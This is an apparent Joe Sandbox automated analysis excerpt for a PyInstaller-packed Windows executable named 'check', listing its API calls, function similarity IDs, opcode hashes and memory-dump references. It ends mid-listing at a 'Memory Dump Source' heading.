                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                • Instruction ID: 0ed18a933bf1ae5566bf77bc387482b49b988df993e90f7402eaa082d80e515b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC1E032A0CE8691E7A19B1590402BE3B90EBA1FB0F654231FA4F83796CE7CF8458701

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                • Instruction ID: 6b1641e225bb048a6cbb910fe2b97b4155014182d9a74141c5c06e437b75ce08
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4212F31A1CE4242EA909B56B54422EA7A4EBD5FB0F540235FA6DC3AF9DE6CE4458700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: GetCurrentProcess.KERNEL32 ref: 00007FF61E8E8590
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: OpenProcessToken.ADVAPI32 ref: 00007FF61E8E85A3
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: GetTokenInformation.KERNELBASE ref: 00007FF61E8E85C8
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: GetLastError.KERNEL32 ref: 00007FF61E8E85D2
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: GetTokenInformation.KERNELBASE ref: 00007FF61E8E8612
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61E8E862E
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E8570: CloseHandle.KERNEL32 ref: 00007FF61E8E8646
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF61E8E3C55), ref: 00007FF61E8E916C
                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF61E8E3C55), ref: 00007FF61E8E9175
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                • Instruction ID: a6f2e5d5c0d42e03fd21b266363e98fb02ab36a7e1e5d79ea0a5799b4259108b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE217131A08F8282F690AB11E4152EA6265FFA8BA0F844435FA4DC3796DF7CF8448740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF61E8E352C,?,00000000,00007FF61E8E3F23), ref: 00007FF61E8E7F32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                • Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                • Instruction ID: 3b20cef667913d013ec62c368d5e251e069dae62f6e878f71aa91a9b39c3ded6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E531D421619EC245EAA19B22E4103EA6358EFA4FF4F440230FE6D877C9DE2CF6058700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8FCF4B), ref: 00007FF61E8FD07C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8FCF4B), ref: 00007FF61E8FD107
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                • Instruction ID: 4c02bdebe9023d4c84372e6e63a8c1b75b759abb50fc618b750bb59477cfd45d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C491A132E18A5285F7A09F6594403BD6BA0AB64FA8F544139EE1E97AC5DF3CF482C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                • Instruction ID: f558e89c442362ee9d5ecf949e13c1c52976355667aff1e5293e7f518e882bc8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34510472F04A128AEB64CF6499616BC27A5AF64B78F500235FD1E92AE5DF3CF442C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                • Instruction ID: 454877dbbd339d6df522d500482e9e9a488e2ec81d24594dcef0d817f631b3fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86518E32E18A418AFB94CF71E4503BD37A5AB68F68F144435EE0D97689DF3CE8418720
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                • Instruction ID: 8cbbb1a6237784e4fa2b2da9bf532ec3b72f8409f56f1449294e8423b306a78f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6417322D18B8283E7948B6095503696760FBA4BB4F109335F66D83AD6EF7CF5E08750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                • Opcode ID: 7662534ecdc97d6342c3e0d7e722e165cf5bb1cfcc07ddf2744ed34bc55cb2d4
                                                                                                                                                                                                                • Instruction ID: 6b308c802c33ae097a27d0f83543bfc2219f60dbb703b06216ec299f3fe30ca7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7662534ecdc97d6342c3e0d7e722e165cf5bb1cfcc07ddf2744ed34bc55cb2d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F314C21E0CE8745FAD9AB7694123B92681AF71FA4F485434F90EDB2D3EE6DF904C201
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                • Instruction ID: a93cee7d19c051f4666f7f252ca68bb2e09f42bb41f1d44f9e7197180edecbf0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84D09E20B48F0642EB982FB05C5507812596FA8F21F581838E80BC6393FD2CF84D4300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                • Instruction ID: 4868be33f20bb310f0abd35bcc3862f1632fd4453bc536289865619c136b0eb3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8051F721B09A428EFBA89A65940067A66D1BFA4FB4F184734FD7DC37D6CE3CF4429600
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction ID: 4d5e0b083eb6f4d11dd63327df85b661a758a420317fc1ff75c23199e3c063d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95110462A08E8181DB608B25A810169A361AB61FF4F640331FE7D877D9DF3CE1508704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8F5839), ref: 00007FF61E8F5957
                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8F5839), ref: 00007FF61E8F596D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                • Instruction ID: 431c9b4c97a666930ce12976f60352d88213529d3baa2bae8ed54b8c063a055b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11913160CB4282EB988B15B41103EB760FB94BB1F601236FA9EC19D8EF2CE454DB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                • Instruction ID: 72e064e628bd2f42a97a3462ca5a34df7f4fab804c24a72e8da4de7da810ecab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE08C60F19E0342FF58ABF2A8551381250AFB8F30F844435F81EC22A2EE2CF8868310
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF61E8FA9D5,?,?,00000000,00007FF61E8FAA8A), ref: 00007FF61E8FABC6
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF61E8FA9D5,?,?,00000000,00007FF61E8FAA8A), ref: 00007FF61E8FABD0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction ID: a7b14fc9c6fa3f35fd5f2477022c2c0296261721d7637198d71004bb4e66a138
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C21A121F18E8241EFE09761949537992829FA4FF0F1842B9FA2EC77D2DE6CF4414300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
